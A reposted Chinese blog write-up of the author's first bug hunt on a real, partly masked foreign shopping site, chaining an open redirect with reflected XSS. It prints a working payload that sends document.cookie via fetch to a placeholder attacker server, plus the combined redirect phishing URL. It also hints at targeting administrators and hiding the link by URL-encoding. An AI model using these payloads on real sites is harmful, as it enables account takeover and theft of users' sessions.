服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

记一次真实对国外某购物平台web漏洞挖掘

日期: 来源:黑白之道收集编辑:

(真实世界)我的第一次真实对国外某购物平台web漏洞挖掘
  • 开放重定向 - 低危

  • XSS - 低危

这两组合起来就完全不一样一点的,个人觉得比原本高一些

危害:窃取用户敏感数据、用户cookie、钓鱼操作 等…

前言

这是我第一次,真实世界的web漏洞挖掘(开发重定向 + xss)

虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单

虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单

虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单

这次漏洞挖掘是无意的,这是我在做题的时候,题目需要我进行信息收集,我收集到相关的一个网站,于是在这个网站多看了几眼,发现了漏洞

首先我打开这个网站的第一件事,也是最简单的:查看源代码

源代码:

在源代码中发现这一个url

url参数重定向 - OpenRedirect

分析:

/sign-in?redirect=

这里我测试过,因为这里是用户登录页面

  • 如果用户未登录,则在用户登录成功后,重定向到redirect参数指定的url

  • 如果用户已登录,则直接跳转到redirect参数指定的url

当我尝试修改redirect参数,改成百度:

在已登录状态下,确实重定向到百度去了

open redirect的好兄弟

我们都知道,单单一个开放重定向通常情况下危害不大,甚至可以忽略不计,没啥用

但是可以搭配其他漏洞来做一套组合拳,这个漏洞就是xss.

通过开放重定向漏洞将受害者重定向到被攻击者控制的具有xss漏洞的页面上,执行恶意js代码

通过这套开放重定向 + xss

攻击者很容易获得一些信息,如:

  • 用户的cookie

  • 攻击者期望的操作,例如:下单、修改账户等相关操作

  • 社会工程 - 攻击者利用xss构建恶意代码,攻击者诱导受害者填写隐私信息以获取攻击者想要获取的受害者的信息

等等等等

所以现在我们的当务之急应该寻找xss漏洞,打一套组合拳

XSS - 反射型

果不其然,经过tryhackme的训练,我一下子就找到了

就在网站主页的搜索功能!

一开始尝试sql注入,但是无果

但是第二次尝试寻找漏洞的时候,我发现输入的内容会拼接到回显页面中,于是开始尝试xss

它直接镶嵌到span标签中

我直接绕出去了,毫无难度,成功找到反射xss漏洞

XSS + OpenRedirect - 组合拳

兔年万事如意,心想事成

现在我们可以尝试简单的利用xss+开放重定向获取用户的cookie

构造XSS Payload:

https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

注意:这里的fetch函数中的url不能携带有http://或https://,否则会失败,所以使用//

最好不要有空格,因为此payload稍后将会放到url参数中

我们可以直接验证此payload是否有效:

可以看到它携带着cookie去请求攻击者托管的http服务器去了!

现在让我们将xss和开放重定向组合起来:

实现让用户点击我们的精心设计过的登录url,即可窃取该用户的cookie等

如果通过钓鱼等方式令网站管理员点击此恶意链接会发生什么事?

我很难想象,毕竟这个平台有些地方甚至没有csrf防护,也别忘了我们还有xss

回归正题

首先,随便注册个账户并登录

XSS Payload:

https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

OpenRedirect Payload:

https://www.nonno.co.uk/sign-in?redirect=https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

解析:当已登录用户点击此OpenRedirect payload的url,将重定向到xss漏洞处并执行我们指定的恶意js代码,这里的js代码使用fetch发送请求到我们攻击者的http服务器并附带cookie

至此漏洞利用完成,攻击者将获取受害者的cookie,甚至其他任何操作!

只要适当的将payload进行urlencode,受害者可能根本无法判断!

更进一步的利用:OpenRedirect + XSS,再加csrf等等等等,危害还能在提升

漏洞修补建议

OpenRedirect

  • 不要使用url参数(GET or POST)来进行重定向,即便使用,也要做好防护,避免idor

  • 完善各个功能的csrf防护

XSS

  • 做好用户输入检测,检测到黑名单字符直接禁止访问

  • 过滤特殊字符

结束

事实上我这里只找了两个漏洞,很难猜测其他地方是否还存在其他漏洞。

希望平台管理方认真做好安全防护

这也是我的第一次真实的web漏洞挖掘,我非常的激动,这是一次无意的漏洞挖掘,真的是无意的

不说了,跑路了

————————————————

作者:Sugobet
原文链接:https://blog.csdn.net/qq_54704239/article/details/128754634


黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

多一个点在看多一条小鱼干

相关阅读

  • 2023红队必备工具列表总结​

  • 一、信息收集1、AppInfoScanner一款适用于以HVV行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、红队成
  • 【漏洞通告】Smartbi 远程命令执行漏洞

  • 漏洞名称:Smartbi 远程代码执行漏洞组件名称:Smartbi影响范围:V7 <= Smartbi <= V10.5.8漏洞类型:远程代码执行利用条件:1、用户认证:不需要用户认证2、前置条件:默认配置3、触发
  • DoH,隐蔽隧道又添利器,强盾在何方?

  • DoH这个词对于很多安全从业人员并不是个新词,但对其前世今生能洞若观火的却不多。本期前瞻洞察将从DNS的隐私与安全问题出发,讲述DoH为什么诞生,DoH的出现到底利弊几何,对其弊端
  • 大疆无人机被检测出16个安全漏洞

  • Bochum and Saarbrücken 的研究人员在制造商DJI制造的几架无人机中发现了安全漏洞,其中有些漏洞非常严重,比如通过某漏洞可更改无人机的序列号,或能直接将“安全部门跟踪无人
  • 安全热点周报(2023.2.27-2023.3.5)

  • 安全资讯导视01 美国政府发布2023年版《国家网络安全战略》02 中共中央、国务院印发《数字中国建设整体布局规划》03 知名互联网厂商APP利用漏洞非法控制用户手机窃密,数亿设
  • 雷神众测漏洞周报2023.02.27-2023.03.05

  • 以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修
  • 雷神众测漏洞周报2023.02.20-2023.02.26

  • 以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 感染了HPV病毒,究竟是怎么回事儿?

  • 推/荐/阅/读 | 居家防护喷嚏不止,鼻涕连连!这套居家防护“宝典”拯救你! | 肺癌这个行为让不吸烟的人也得肺癌,女性尤其需要注意 | 肿瘤导致肿瘤患者去世的第二大病因竟然是它!预
  • 白嫖|2023千人白帽系列公开课今晚开讲!

  • 01福利福利免费公开课如下:2023华盟信安千人白帽系列公开课即将开讲华盟三位资深讲师21天!9场公开课邀您共同学习……渗透测试怎么学?什么是漏洞复现?暴力破解?HW常见钓鱼手法小
  • 记一次真实对国外某购物平台web漏洞挖掘

  • (真实世界)我的第一次真实对国外某购物平台web漏洞挖掘开放重定向 - 低危XSS - 低危这两组合起来就完全不一样一点的,个人觉得比原本高一些危害:窃取用户敏感数据、用户cookie、
  • 2023红队必备工具列表总结​

  • 一、信息收集1、AppInfoScanner一款适用于以HVV行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、红队成
  • 交易所收紧基金子公司ABS业务

  • 欢迎加入知识星球交流欢迎扫码加入我的知识星球,本群长期密切跟踪宏观和债券市场(包括但不限于公司债券、企业债券、明珠债券、境外债、债务融资工具等),不定期分享窗口指导、政